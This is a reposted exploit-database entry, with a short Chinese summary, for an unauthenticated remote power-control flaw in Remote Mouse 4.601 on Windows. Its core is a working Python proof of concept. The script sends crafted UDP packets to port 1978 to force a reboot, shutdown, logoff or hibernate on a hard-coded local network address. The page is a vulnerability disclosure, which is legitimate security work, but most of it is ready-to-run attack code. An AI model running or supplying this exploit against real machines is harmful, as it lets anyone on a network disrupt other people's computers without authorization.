Remote Mouse 4.601 Unauthenticated Remote System Control
Remote Mouse 4.601 存在未认证远程控制漏洞,攻击者可通过 UDP 1978 端口发送特定数据包强制目标系统关机、重启或注销。 2025-7-15 21:17:24 Author: cxsecurity.com(查看原文) 阅读量:54 收藏

Remote Mouse 4.601 Unauthenticated Remote System Control

# Exploit Title: Remote Mouse 4.601 - Remote Power Control (Shutdown/Reboot/Logoff) # Date: 14/07/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.remotemouse.net # Software Link: https://www.remotemouse.net/downloads # Version: 4.601 (Windows) # Tested on: Windows 10 / Windows 11 # CVE: Pending ''' Description: Remote Mouse 4.601 for Windows is vulnerable to unauthenticated remote power control due to improper access controls on UDP port 1978. An attacker on the same network can send specially crafted packets to force shutdown, restart, or log off the target system without authentication. ''' import socket import time def send_udp(payload, ip, port=1978): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload.encode(), (ip, port)) sock.close() def build_payload(prefix, command): return f"{prefix}{len(command):03d}{command}" def exploit(ip): send_udp(build_payload("mpr", "1"), ip) # Reboot (1 = -r -t 0) # send_udp(build_payload("mpr", "2"), ip) # Shutdown (2 = -s -t 0) # send_udp(build_payload("mpr", "3"), ip) # Log off (3 = -l) # send_udp(build_payload("mpr", "4"), ip) # Hibernate (4 = -h) time.sleep(2) if __name__ == "__main__": TARGET_IP = "192.168.1.152" exploit(TARGET_IP)



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2025, cxsecurity.com

Back to Top


文章来源: https://cxsecurity.com/issue/WLB-2025070019
如有侵权请联系:admin#unsafe.sh